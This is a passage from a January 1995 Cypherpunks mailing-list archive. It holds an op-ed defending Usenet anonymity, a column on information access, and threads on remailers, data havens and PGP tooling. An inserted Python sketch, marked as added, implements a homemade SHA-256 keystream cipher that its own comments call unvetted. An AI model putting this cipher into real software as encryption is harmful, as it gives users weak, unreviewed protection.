Usenet. Who was responsible for the original green card spam? Why, Ms. Siegel herself, the same one who is complaining about "chaos and anarchy." Chaos, anarchy, and anonymity are a large part of what keeps the Net so vital. Particularly galling is Ms. Siegel's appeal to free speech. Usenet in its present form is perhaps the most conducive forum for free speech in history. The threat to free speech is not from chaos or anonymity, but from the sorts of changes that Ms. Siegel proposes. Usenet is astonishingly effective in getting around the practical barriers to free speech. These barriers come in many forms, including libel, trademark, and copyright laws, fear of retribution, etc. Because of its decentralized, communal nature, Usenet resists direct attempts to censor. 
The main tool for circumventing more these more indirect barriers is anonymity. As an example of such barriers, take the t-shirt commemorating the green card incident. It was emblazoned with the words, "Green Card Lawyers - Spamming the Globe" and a fist clutching a green card. Shortly after the shirt was proposed, Canter & Siegel threatened to sue if the shirt was in fact produced. It was only after several outraged lawyers promised to defend against such a case pro bono that I and others could be proud owners. Or take one of the sexual abuse recovery newsgroups, where anonymity is the norm. If someone were to post a message asking for support, saying "my uncle did it" under their real name, they would be vulnerable to a libel suit from said uncle. On the other hand, if they used an anonymous service such as the one in Finland, they would not simply escape punishment for the libel, but prevent it from happening at all. In many countries (and even China is on the Net these days), writings critical of the government, such as exposure of human rights abuses, are illegal. The authors face imprisonment, torture and death. By posting anonymously to the Net, the information can be brought safely to the attention of the world. Not all anonymous messages are pleasant or popular. Unpopular speech is a necessary consequence of free speech. At least to the founders of this country, the benefits of free speech outweigh the discomfort. Our founding fathers were also comfortable with anonymity -- the Federalist papers were originally published under the pseudonym Publius, because the authors felt the ideas should be evaluated on their own. Judging from the materials already published by Ms. Siegel, an Internet built according to her vision would free of such disturbing ideas, but would readily support five hundred channels of green card ads, impassioned pleas to purchase American flag plaques, and, yes, anonymous testimonials for radial keratotomy specialists. 

From jya at pipeline.com Sat Jan 14 07:01:43 1995
From: jya at pipeline.com (John Young)
Date: Sat, 14 Jan 95 07:01:43 PST
Subject: NYT on Phiber Optik
Message-ID: <199501141501.KAA13781@pipe1.pipeline.com>

There's an article today on Phiber's return to indecency, a recap of MOD and celebratory party, with digs by unnabbed hiway-weebs.

For copy send blank message with subject: PHI_out

From rishab at dxm.ernet.in Sat Jan 14 08:59:17 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 14 Jan 95 08:59:17 PST
Subject: BBC on Net trade, G7 special summit
Message-ID:

BBC WSTV reports on commerce on the Net prior to a special G7 meet on the implications of the infosphere. Surprisingly, they don't mention anarchic blackmarketeers; more surprisingly they don't mention encryption - which one might expect when they talk about a one-man garage firm settling multimillion $ commodities trade contracts over the Net.

Some people are about to learn something really fast. Let's hope they don't react like C&S.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh             "In between the breaths is
rishab at dxm.ernet.in             the space where we live"
rishab at arbornet.org                   - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335       H 34C Saket, New Delhi 110017, INDIA

From rishab at dxm.ernet.in Sat Jan 14 08:59:18 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 14 Jan 95 08:59:18 PST
Subject: Gateways to the infosphere
Message-ID:

Here I argue that universal service is unnecessary even for equal distribution of information age opportunity, if one drops the 'highway' metaphor which, as I argued in the last episode, is lousy. This one also points out the advantage and use of demand-driven markets in widening access - Bombay slum-dwellers without clean water buy colour TVs and VCRs.

For info on back issues, send a blank message with 'get help' (without the quotes) as the Subject to rishab at arbornet.org (do NOT 'r'eply to _this_ message).

--------cut here--------

Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#43, 9/January/1995: Gateways to the infosphere

Asimov once wrote of a universe where intelligent life was intelligence alone, roaming the avenues of pure thought divorced from all physical form. To reach the infosphere with your feet still on this planet though, you need a point of access, a gateway to what could easily become another world in your life. The nature of these gateways, their availability and their owners are among the more contentious aspects of the global information infrastructure.

The task of developing this infrastructure to the point of ubiquity has been compared to the construction of road networks - any place, however remote, must be connected to every other. As this would make little economic sense for private investors, the task had to be one for the government. Present-day governments are poor, so they insist that subsidies should come from business in the form of universal service: providing the same thing at the same prices everywhere.

The rationale for this is noble - equal opportunity to all. Without roads people can't get anywhere, literally and economically, and the same must be true for information highways. But if the info-highway is actually an information ocean, the situation changes dramatically. It is no longer necessary to move from place to place, but simply to dive in.

This is true even in practical terms. On a highway, the route traffic takes is important, because of the distance, while on the Internet routing is a very low-level, technical sort of thing, as data may travel in little pieces on different paths, ignoring geographical distance. Moreover, a highway needs a physical connection between any two points, which affects costs, while the infosphere floats above waiting to be reached through a satellite transceiver from just anywhere.

Nor will the lack of universal service lead to a society of information haves and have-nots. Information is unique in that one doesn't 'have' it. It is created, and a 'have-not' can easily become a 'have'. The possible inequality is in trading information resources, in knowledge opportunities. However, especially in the field of information, people are not equally equipped to take advantage of opportunities, however unequally distributed the latter may be.

Instead of demanding universal service, governments should encourage the development of infrastructure where it will be best used, which is in the interests of business, anyway. Unfortunately even telecom corporations have an incorrect perception of who the best users are. They believe in connecting those who can pay now for services, rather than the many more who would benefit and therefore be able to pay the most, once they exploit currently non-existent opportunities. Demand-driven markets grow fastest, though companies right now seem to be more interested in shoving interactive television down the eyes of the reluctant and rather bored elite.

A demand-driven information market is harder to work with, as prospective buyers (as also the sellers) have to be convinced of the benefits of technology. But the potential markets are huge, if far from the minds of the vendors of 'convergence' technology, as peoples' information (or entertainment) needs are often more basic than their material needs - just look at Bombay slum-dwellers, who despite limited access to clean drinking water, buy colour televisions and VCRs. They only needed to see what TV was good for, first.

An information ocean is cheaper to build than any highway could possibly be. It needs no legislation to exist everywhere, this is in its very nature. Gateways to the infosphere will, governments permitting, sprout spontaneously wherever needed, as cracks on the surface of a frozen sea.

Rishab Aiyer Ghosh is a freelance technology consultant and writer. You can reach him through voice mail (+91 11 3760335) or e-mail (rishab at dxm.ernet.in).

--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
This article may be redistributed in electronic form only, PROVIDED
THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT
UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
or redistributed in any form for compensation of any kind, WITHOUT
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab at dxm.ernet.in)
--==================================================================--

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh             "In between the breaths is
rishab at dxm.ernet.in             the space where we live"
rishab at arbornet.org                   - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335       H 34C Saket, New Delhi 110017, INDIA

From raph at netcom.com Sat Jan 14 09:32:39 1995
From: raph at netcom.com (Raph Levien)
Date: Sat, 14 Jan 95 09:32:39 PST
Subject: Final draft of editorial to SF Chronicle
Message-ID: <199501141731.JAA23607@netcom11.netcom.com>

This is the final cut. Only minor copyedits have been made. Thanks to all who responded -- about a dozen messages all strongly in favor.

Anyone know the email address or fax number for the Chicago Tribune?

Raph

Chaos and Anonymity keep the Internet Vital

I could not let Martha Siegel's editorial ("Anarchy, Chaos on the Internet Must End", 2 Jan 1995) go unchallenged. To the uninformed reader, her arguments may seem plausible. However, her distortions give a picture of the Internet quite at odds with the true nature of the Net. Her views are by no means representative of those who actually use the Net. Of the dozens of messages I saw in response to the editorial, not a single one was in favor of her proposals.

As Ms. Siegel correctly points out, the Net is not governed by any one individual person or organization. Rather, it is collectively run by those who use it as part of their daily lives. The operation of each Internet node is subject to the individual judgement of the people who own it. Ms. Siegel is wrong, however, in believing that such a state of affairs is intolerable. Rather, this state of affairs has brought us a remarkable flowering of discourse, ideas and culture, which is just now beginning to be recognized in the mainstream press.

In a lawyer's dream world, there is a rule covering every action in every situation, along with a well-functioning system to enforce the rules. This is the exact opposite of the spirit of the Net, and in particular of Usenet, the collection of ten thousand newsgroups which carries most public discussion on the Net. Rather, there has evolved an informal set of guidelines for promoting open, civil discourse, collectively known as "netiquette." These guidelines may seem arcane to newcomers, but basically they simply ask people who use the Net to be considerate of other people, their time and their resources. A violation of netiquette brings on not legal action, but responses pointing out why the action was inconsiderate. Continued violation brings on ridicule and scorn -- people who engage in this are considered to be either sociopathic or just obnoxiously self-promoting.

The single most infamous breach of netiquette in Usenet history was almost certainly the "green card spam," in which thousands of advertisements for green card services were posted to completely unrelated newsgroups. Advertisements presented in a way considerate to others are tolerated and even welcomed on the Net. Posting thousands of copies, though, is just going too far.

Negative response was immediate. The perpetrators were asked to stop, but they refused to. One Norwegian hacker took it upon himself to track down and "cancel" the offending messages. Most people on the Net considered this to be entirely appropriate.

A number of other self-promoting hucksters have sensed an opportunity, and have performed similar spams. In response, the Net evolved a defense mechanism to counter these spams and minimize the damage. The person currently serving this role is known by the pseudonym "CancelMoose." Almost everyone on the Net supports this effort, and agrees that it improves the overall value of Usenet.

Who was responsible for the original green card spam? Why, Ms. Siegel herself, the same one who is complaining about "chaos and anarchy."

Chaos, anarchy, and anonymity are a large part of what keeps the Net so vital. Particularly galling is Ms. Siegel's appeal to free speech. Usenet in its present form is perhaps the most conducive forum for free speech in history. The threat to free speech is not from chaos or anonymity, but from the sorts of changes that Ms. Siegel proposes.

Usenet is astonishingly effective in getting around the practical barriers to free speech. These barriers come in many forms, including libel, trademark, and copyright laws, fear of retribution, etc. Because of its decentralized, communal nature, Usenet resists direct attempts to censor. The main tool for circumventing these more indirect barriers is anonymity.

As an example of such barriers, take the t-shirt commemorating the green card incident. It was emblazoned with the words, "Green Card Lawyers - Spamming the Globe" and a fist clutching a green card. Shortly after the shirt was proposed, Canter & Siegel threatened to sue if the shirt was in fact produced. It was only after several outraged lawyers promised to defend against such a case pro bono that I and others could be proud owners.

Or take one of the sexual abuse recovery newsgroups, where anonymity is the norm. If someone were to post a message asking for support, saying "my uncle did it" under their real name, they would be vulnerable to a libel suit from said uncle. On the other hand, if they used an anonymous service such as the one in Finland, they would not simply escape punishment for the libel, but prevent it from happening at all.

In many countries (and even China is on the Net these days), writings critical of the government, such as exposure of human rights abuses, are illegal. The authors face imprisonment, torture and death. By posting anonymously to the Net, the information can be brought safely to the attention of the world.

Not all anonymous messages are pleasant or popular. Unpopular speech is a necessary consequence of free speech. At least to the founders of this country, the benefits of free speech outweigh the discomfort. Our founding fathers were also comfortable with anonymity -- the Federalist papers were originally published under the pseudonym Publius, because the authors felt the ideas should stand on their own, without opinion being swayed by the names behind them.

Judging from the materials already published by Ms. Siegel, an Internet built according to her vision would be free of such disturbing ideas, but would readily support five hundred channels of green card ads, impassioned pleas to purchase American flag plaques, and, yes, anonymous testimonials for radial keratotomy specialists.

------------------------------

Raph Levien is a graduate student in computer science at the University of California, Berkeley

From aj at pcnet.com Sat Jan 14 09:46:07 1995
From: aj at pcnet.com (A.J. Janschewitz)
Date: Sat, 14 Jan 95 09:46:07 PST
Subject: Media watch
Message-ID:

NPR's "Weekend Edition/Saturday" has an insubstantial piece on Phyber Optik on today's program, check local NPR times/listings.

Nexis-hunters might want to check out a manifestly stupid editorial in today's Hartford (CT) Courant, significant only because it is the (L-A Times-owned) paper of record in the state of greatest wealth in the U-S. I would summarize it, but I don't understand it; something to do with shrink-wrap copyrights and digital cash.

Fax copies sent to interested parties, just give me a number.

==a.j.==
"The large print giveth and the small print taketh away." - Tom Waits

From Ben.Goren at asu.edu Sat Jan 14 09:51:54 1995
From: Ben.Goren at asu.edu (Ben.Goren at asu.edu)
Date: Sat, 14 Jan 95 09:51:54 PST
Subject: How do I know if its encrypted?
Message-ID:

Paul, I think we're after two different objectives here. You want Alice to be sure that Dave can't read her file; I want Dave to be sure that he can't read Alice's files.

Alice should worry only about her privacy: if she doesn't want Dave to know what she's sending, she should encrypt her file in a way that Dave cannot break. Dave certainly doesn't want to know what Alice is sending him, because he might have to answer to a Grand Jury if he did.

My protocol makes it very difficult for Dave to gain any useful knowledge about Alice's files. Dave does this not as a courtesy to Alice, but for those three wonderful letters, CYA.

Of course, any data haven worth paying for will offer lots of neat features, like PGP support, anonymous file drops, and all other sorts of goodies. But that does little good if Alice can trick Dave into selling child pornography.

Douglass Floyd asked, "How do I know if [be certain that] it's encrypted?" Unfortunately, I'm pretty sure the answer is, "You decrypt it." My protocol at least delays the decryption until it's [hopefully] too late to matter.

b&

[Here's part of the thread; nothing new follows.]

At 11:00 PM 1/13/95, Paul J. Ste. Marie wrote:
>At 10:07 PM 1/13/95, Ben Goren wrote:
>> ... Alice hashes her file and uses that hash as the key to encrypt the file.
>>She sends the file to Dave, and sends the original hash when she wants it
>>back. Dave decrypts, and confirms the hash.
>>
>>Unfortunately, this still doesn't quite close the loop--Dave knows the
>>contents of the file once Alice sends the key. It does, however, make it
>>very difficult for Dave to know anything about Alice's file. ...
>
>This seems overly complicated. If Dave has a known public key, then Alice
>should be able to hash her file, sign the hash, encrypt (the hash, her
>public key, and the file) with Dave's public key, and (anonymously) sends
>the result to Dave's (encrypted) address. Dave then decrypts, verifies the
>sig, and stores the file, hash, and PK together, indexed by the hash.
>
>When Alice wants the file back, she signs (the hash and her encrypted return
>address), encrypts the result with Dave's key, and sends it off. Dave
>decrypts the request, fetches the public key based on the decrypted hash,
>verifies the signature, encrypts the file with Alice's provided public key,
>and sends it back to the encrypted return address.
>
>To avoid Dave's knowing the file contents, Alice can encrypt it before the
>described protocol and decrypt it afterwards. The protocol is subject to a
>replay attack, but the result of the replay would cause the file to be sent
>to the original sender and not to the replayer.
>
>The signed hash in the first step prevents people from spamming Dave with
>files that have Alice's public key. Alice only requires an encrypted
>address and public key for Dave, and Dave validates the retrieval request
>against the public sent in the first step.
>
> --Paul J. Ste. Marie
> pstemari at well.sf.ca.us, pstemari at erinet.com

--
Ben.Goren at asu.edu, Arizona State University School of Music
Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5.
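
The hash-as-key deposit scheme quoted in the message above, as an added example that is not part of the original posts: a Python sketch of both sides, including the two ways a retrieval fails. The function and class names, the handle Dave files the blob under, and the SHA-256 counter-mode keystream (a stand-in, since the post names no cipher) are assumptions.

```python
"""Both sides of the hash-as-key deposit scheme from the thread (added example).

The post names no cipher, so a SHA-256 counter-mode keystream stands in for
one here; it is an assumption for illustration, not a vetted construction.
"""
import hashlib
import hmac
from typing import Tuple


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt by XOR with SHA-256(key || block counter)."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + (offset // 32).to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


def alice_deposit(plaintext: bytes) -> Tuple[bytes, bytes]:
    """Alice hashes her file and uses that hash as the key.

    Returns (key, blob): she keeps the key and sends Dave only the blob.
    """
    key = hashlib.sha256(plaintext).digest()
    return key, keystream_xor(key, plaintext)


class Dave:
    """Storage operator: holds ciphertext only, until a key is presented."""

    def __init__(self) -> None:
        self._store = {}

    def accept(self, blob: bytes) -> str:
        # Hypothetical handle: the hash of the ciphertext, which tells
        # Dave nothing about the plaintext.
        handle = hashlib.sha256(blob).hexdigest()
        self._store[handle] = blob
        return handle

    def release(self, handle: str, key: bytes) -> bytes:
        """Decrypt with the presented key and confirm hash(plaintext) == key."""
        plaintext = keystream_xor(key, self._store[handle])
        if not hmac.compare_digest(hashlib.sha256(plaintext).digest(), key):
            raise ValueError("presented key does not match the stored file")
        return plaintext

    def matches_known_file(self, handle: str, candidate: bytes) -> bool:
        """Limit of the scheme: the key depends only on the file, so a file
        Dave already holds can be checked against a stored blob."""
        guess_key = hashlib.sha256(candidate).digest()
        return keystream_xor(guess_key, self._store[handle]) == candidate


def demo() -> dict:
    """Run one deposit and three retrieval attempts on constructed data."""
    doc = b"constructed sample file, line of filler text\n" * 16
    key, blob = alice_deposit(doc)
    dave = Dave()
    handle = dave.accept(blob)

    def rejected(k: bytes) -> bool:
        try:
            dave.release(handle, k)
            return False
        except ValueError:
            return True

    wrong_key_rejected = rejected(bytes(32))
    returned = dave.release(handle, key)
    # Corrupt one stored byte: the hash check doubles as an integrity check.
    dave._store[handle] = bytes([blob[0] ^ 1]) + blob[1:]
    tamper_rejected = rejected(key)
    return {
        "stored_differs": blob != doc,
        "wrong_key_rejected": wrong_key_rejected,
        "round_trip_ok": returned == doc,
        "tamper_rejected": tamper_rejected,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Because the key is derived from the file alone, depositing the same file twice yields the same blob, which is what `matches_known_file` relies on; the scheme hides unknown files from Dave, not files he can already guess.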

From pfarrell at netcom.com Sat Jan 14 10:29:55 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Sat, 14 Jan 95 10:29:55 PST
Subject: State of PGP dll?; Encrypted session projects
Message-ID: <48550.pfarrell@netcom.com>

sdw at lig.net (Stephen D. Williams) writes:
> What is the state of the Windows/.dll PGP libraries?
> Does anyone have a usable version yet?

I helped David get a compiled version of a .DLL, but it was way too raw to use. Specifically, all we did was make a DLL of all of the code, exporting all of the subroutines. A useful .DLL would only publish the "important" ones, and leave the internals hidden. The selection of which routines need to be classified as "important" is a bunch of work. Additionally, I expect that some of the routines would really be better off with a wrapper that made less of their internals visible.

All quite doable, but a non-trivial effort. I know I'm too busy to attack it.

> For Windows: twnsck12.zip, which is simple, is GNU, and has source and
> by writing a relatively simple windows serial terminal emulator and
> using Comt ($15 or 25 shareware) to convert it to a telnet client.
> Both of these could be modified fairly easily.

There are sources to a simple terminal emulator in the MSVC samples directory. Changing it to use sockets wouldn't be all that hard. Last time I looked, comt didn't work under NT, and so I stopped looking at it.

There are also terminal emulators in the code in at least two books, Monk's Windows Programmer's Guide to Serial Communications, and Nelson's Serial Communications, a C++ developer's Guide. Since I'd much rather write C++ than C, I prefer Nelson's.

I use ewan as a terminal emulator, got it from cica or wustl, I forget which. Dunno if sources are available.

> Does anyone have better ideas? Any suggestions on login/key
> exchange sequence?

SKey would work if you are talking to a unix box that you can get the admin to change.

Pat

Pat Farrell      Grad Student                 pfarrell at cs.gmu.edu
Department of Computer Science    George Mason University, Fairfax, VA
Public key available via finger          #include

From lce at wwa.com Sat Jan 14 10:31:21 1995
From: lce at wwa.com (Larry E)
Date: Sat, 14 Jan 95 10:31:21 PST
Subject: How do I know if its encrypted?
In-Reply-To: <9501140112.AB29647@eri.erinet.com>
Message-ID:

In article <9501140112.AB29647 at eri.erinet.com>, pstemari at erinet.com (Paul J. Ste. Marie) wrote:

> At 09:17 PM 1/12/95 -0600, Larry E wrote:
>
> > (2) legal groups etc. who may try to hold the remailer
> > liable in some way for what passes through their remailer.
>
> It strikes me that this is a very weak defense. Legal beagles will probably
> argue that the remailer should have either prohibited encrypted
> communications or else was in collusion with the sending party.
>

Those who believe remailers are an evil will argue against any measure that will promote their presence (and I'm not suggesting you're in that group). I disagree strongly with their stance. I would be happy if there were three or four times as many remailers operating as there are now.

The issue of whether encryption is a foolproof defense is not the primary issue. The issue is: what steps can be taken to improve the lifespan of existing remailers and promote the addition of new ones. Resolving the problems that cause remailers to fold will be an evolutionary process, and no step along that path will be perfect or resolve all the problems that plague the remailers.

Is encryption a step in the right direction, if an imperfect one? If not I hope some other positive steps are proposed soon, else I fear remailers may face extinction.

From jsled at free.org Sat Jan 14 15:18:38 1995
From: jsled at free.org (Josh Michael Sled)
Date: Sat, 14 Jan 95 15:18:38 PST
Subject: Slogan/procmail help
Message-ID: <199501142337.XAA08521@squeaky.free.org>

-----BEGIN PGP SIGNED MESSAGE-----

Speaking of testing stuff....

After my last question about C'punks slogans, I've messed up some stuff and haven't storage of the list since, therefore I don't have any of the replies. If anyone would like to compile a list of what's been said (if anything) and mail to to me (to jsled at ctp.org), I'd be eternally grateful.

Also, if anyone is fluent in procmail (I think there are a couple of you floating around), please mail me at jsled at ctp.org...

Thanks a bunch, sorry for the annoyance.

Joshua M. Sled

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLxfoaaTT29daLBKRAQGXlQP/dYc4aPR7rNApmqG78jIDhYZJh6bqMg4i
AXVAAZ5IzLP4Z/qch7zkiTM05DjbmXOzkcVBmhlGlO+H2VfNug569A/jEKFnDrDs
wg0Rv5mPWLo74zUECHxp7faviAVmOxt7Bx3JzQCmHZXBekq+owUetEraq9hKzCzr
qQR+KUq3X+k=
=4gq8
-----END PGP SIGNATURE-----
---
KWQ/2 1.2g NR "MTV get off the air!" - DKs

From rishab at dxm.ernet.in Sat Jan 14 15:33:37 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 14 Jan 95 15:33:37 PST
Subject: Cybersmut
Message-ID:

John Young quotes NY Post on Kiddie porn:

Rule No. 1 is that [kids] must never ever give their real name, address or telephone number to anyone on-line.

Hurray! Let's teach the next generation the value of pseudonymity now! BAN TRUE NAMES!

Note: I still have mine in my sig though... too late for me. Tim's axed his phone # suddenly!

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh             "In between the breaths is
rishab at dxm.ernet.in             the space where we live"
rishab at arbornet.org                   - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335       H 34C Saket, New Delhi 110017, INDIA

From rishab at dxm.ernet.in Sat Jan 14 15:37:37 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 14 Jan 95 15:37:37 PST
Subject: Data Havens, NOT!
Message-ID:

Hal Finney writes:
> The data haven concept as I understood it held data for public access in
> some form (for sale or for free) which would be illegal in some
> jurisdiction. This might include credit information that was older than
> the legal limit, libelous claims, damaging medical records, etc.
> Frankly, I suspect that most usages would be directed towards reducing,
> rather than increasing, individual privacy. So this is not an area I am
> interested in working towards.

I believe the Data Haven started out as a Message Haven to get the effect of anon remailers with less traffic analysis hassles, so there would be no pseudonymous login or anything, you'd either download everything, or apply some filter (as with an alt.anon-messages group).

However, the current discussion of glorified remote file systems makes no sense to me. If you can keep something encrypted on a remote site as an archive, you can do it at home. A data haven is more likely to get busted than your home PC; serious efforts (RF pickup of keystrokes/display) will be equally effective in either case.

Here's a summary of data havens as I see them:

Remote file system where people can anon/pseudonymously dump and read files - in the 'pure' variety there'd be no record of who posted/can read a file.

Advantages:
1. Could hinder traffic analysis, if they did not have pseudonymous login in any form.
2. Could act as a store of encrypted data for those who can't/don't encrypt on their own systems
3. Could act as a backup

OTOH:
1. Would depend on 'correct usage' ie download of enough irrelevant cover data, and would be vulnerable to analysis at the TCP/IP level. Newsgroups remain far better as means to evade traffic analysis
2. Don't keep all your encrypted BlackNet commodities in one basket - it can be busted more easily than your home machine. If you can encrypt there you can encrypt at home; if encryption is illegal at home, you can't legally access the havens.
3. Pfaugh! Rent space on Netcom.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh             "In between the breaths is
rishab at dxm.ernet.in             the space where we live"
rishab at arbornet.org                   - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335       H 34C Saket, New Delhi 110017, INDIA

From hfinney at shell.portal.com Sat Jan 14 15:39:11 1995
From: hfinney at shell.portal.com (Hal)
Date: Sat, 14 Jan 95 15:39:11 PST
Subject: How do I know if its encrypted?
Message-ID: <199501142339.PAA08580@jobe.shell.portal.com>

If you want to not be able to read the files on your storage site, then why not just try reading them? Check their entropy to make sure it is maximal, check that they can't be unzipped, unstuffed, displayed as gif or jpeg files. When a new format becomes popular add that to the list. This is all you can do.

What does this gain you? I'm not sure. If someone posts encrypted Windows 95, then publicizes the location and the key, people will get the data just as easily as if it were not encrypted.

Hal

From 73211.3713 at compuserve.com Sat Jan 14 15:46:40 1995
From: 73211.3713 at compuserve.com (Loren Fleckenstein)
Date: Sat, 14 Jan 95 15:46:40 PST
Subject: voice pgp
Message-ID: <950114234444_73211.3713_DHI35-1@CompuServe.COM>

I've heard mention that Phil Zimmermann was going to demonstrate Voice PGP at the January Cypherpunks meeting at Cygnus. Can anyone mail me a note about this? Has the meeting already taken place? How well did the demo perform?

From Ben.Goren at asu.edu Sat Jan 14 16:24:34 1995
From: Ben.Goren at asu.edu (Ben.Goren at asu.edu)
Date: Sat, 14 Jan 95 16:24:34 PST
Subject: Self-service computers
Message-ID:

A friend of mine forwarded this to me; I couldn't resist forwarding it to the list.

b&

----

Date: 4 JAN 1995 16:32:23 -0500
From: Kay Lukens
Newgroups: alt.humor.best-of-usenet
Subject: [pdx.general] Re: Keep self-service COMPUTERS out of Oregon!
From: keithl at chip.klic.rain.com (Keith Lofstrom) Newsgroups: pdx.general,or.politics Subject: Re: Keep self-service COMPUTERS out of Oregon! It has been pointed out by the stalwart defenders of our rights (to be told what to do) that self-service for gasoline is a Bad Thing. We are assured by many of the same people that self-service for pharmaceuticals, personal defense, transportation, and education are also Bad Things. Other folks, nominally their political competitors (in the same sense that Burgerville and Burger King are competitors) assure us that self-service in personal morality is an *extremely* Bad Thing. And look at what happened to Joycelin Elders when she suggested self-service for sex... >From this, we must conclude that self-service is in itself highly suspicious. Look at self-service grocery stores - all the time people are buying things that are bad for them. Self-service entertainment has resulted in Beavis and Butthead. And look at the way many computer professionals dress - if this is not an indictment of self-service apparel, what is? However, in the finest tradition of bureaucratic micromanagement, we as computer professionals are not qualified to even consider these effects on other aspects of Society. Such thoughts must be reserved for Wiser Heads Than Ours (unless of course the subject is economics or nuclear power, in which case Our Opinions Count). No, we as computer professionals must confine our thoughts to self-service as it affects us - through our flagrant, dangerous, and socially irresponsible use of Self-Service Computers! Self-Service Computers: Threat or Menace? Carpal Tunnel Syndrome. Backaches. Obesity. Bleeding Piles. Bill Gates and Steve Jobs. Computers are a known health threat. Reputed Scientific Journals, such as the National Enquirer, are full of stories of people being turned into three-headed cabbages by Nucular Radiation from video displays. 
It is obvious that the average computer professional, while quite able to find obscure flaws in Pentiums or the secret levels in Doom, is a helpless incompetent when it comes to actually typing on or reading from personal computers. We get so caught up in our alleged thinking that we don't notice our bodies turning into rickety tubs of cancerous lard. We Need Help! Meanwhile, the Great Unwashed Masses are being deprived access to the Information Super Duper Highway. Confined to low paying jobs as sanitation workers or Congressional Representatives, these poor wretches are unable to share in this cornucopia of undocumented, virus-ridden software, poorly informed opinion, and stolen pornography that we call the Internet. These outcasts of the information age must fritter away their time which such mind-numbing activities as outdoor sports, rampant sex, and junkets to the Caribbean. When these people accidentally find their way onto the Internet, perhaps by mistakenly sending their rent check to America On Line, they begin posting meaningless, inappropriate drivel such as spam advertisements for shady lawyers, or actual referenced facts from original sources, violating the hallowed traditions of the Internet. While all citizens must have access to the Net, LET'S NOT GET CARRIED AWAY HERE. What Should We Do? (That is, how can we find new excuses to control other people with minority opinions?) The only solution is to ELIMINATE self-service computers! Every computer in the State of Oregon *must* be operated by THREE OR MORE people - one to do the thinking, one to do the typing, and one to read the screen - preferably through a foot of leaded glass! Think of all the jobs this would create! Not only would we have jobs for all the new operators themselves, we could create vast new bureaucracies to insure that the operators are specially trained, certified, and licensed! 
Computer Cops could roam the streets, equipped with special Jolt-sniffing dogs, breaking down the doors of self-service scofflaws! Pizza delivery drivers would find new income and respect by turning in their hacker clients! Elizabeth Furse, famous for not reading her own email and for having flunkies type in press releases, will become our shining symbol of the new, socially responsible computer age! You can help. Send your checks to C.A.S.H., the Committee to Abolish Selfservice Hardware, care of me (thnx Frank). I will see that your donation gets the attention it deserves. And on behalf of all of us here at C.A.S.H. (Arnold who handles the left side of the keyboard, Julia the right side, Millie the punctuation, Sam who reads the verbs, Trevor who reads the nouns, and our shop steward Penny, who is lobbying for a government grant to bring in a mentally-challenged lesbian vegetarian special needs hispanic-surnamed person of color to watch the blinky lights on the modem) may you have an appropriate and socially enlightening seasonal celebration! -- Moderators accept or reject articles based solely on the criteria posted in the Frequently Asked Questions. Article content is the responsibility of the submittor. Submit articles to ahbou-sub at acpub.duke.edu. To write to the moderators, send mail to ahbou-mod at acpub.duke.edu. -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. From jsled at free.org Sat Jan 14 16:26:24 1995 From: jsled at free.org (Josh Michael Sled) Date: Sat, 14 Jan 95 16:26:24 PST Subject: C`punks slogan? - Pri Message-ID: <199501150045.AAA09400@squeaky.free.org> -----BEGIN PGP SIGNED MESSAGE----- lmccarth at thor.cs.umass.ed wrote: > Lest we suffer a recurrence of the C'punks Logo thread, which generated a > whole raft of list traffic which would have been better kept private, please > reply directly to Joshua and not to the whole list. 
[He seems to imply that > he wants private replies ("testing procmail") anyway, but I want to encourage > this practice explicitly.] Thanks... actually, that's exactly what I wanted, but forgot to put it in... and my last post about "Slogan help": disregard that entirely... it's not needed (either part). But so far I've only gotten one reply about the slogan thing, so please give me help on that one, folks... Josh Sled -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLxf3kKTT29daLBKRAQGEWgQAhrKR/r/+mqXO63RN86c7hq3bsmid2KLU ct2zJAebaZBzVvltrF3WsBYoWmCSo1tWrYFjv3QsU1gnRJRyxSGVtzzkfOSq7b51 UlGRzUb+6AXvviWmqdBwHGWbT4M6/mxxH8X8gC/eeFWyHMpgEcFzhV9tWUHCqkC/ GMDvXoaKPa0= =i71M -----END PGP SIGNATURE----- --- KWQ/2 1.2g NR "MTV get off the air!" - DKs From carolb at barton.spring.com Sat Jan 14 16:28:35 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Sat, 14 Jan 95 16:28:35 PST Subject: Draft of editorial to SF Chronicle In-Reply-To: <199501140623.WAA14448@netcom4.netcom.com> Message-ID: editorial.rad.nice even I'm still here..to show it works. censored.org registration is finally in. Thankx I can even use Lance's remailer correctly now. and so I don't waste "bandwidth" this is end of screen. rad.editorial! RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ 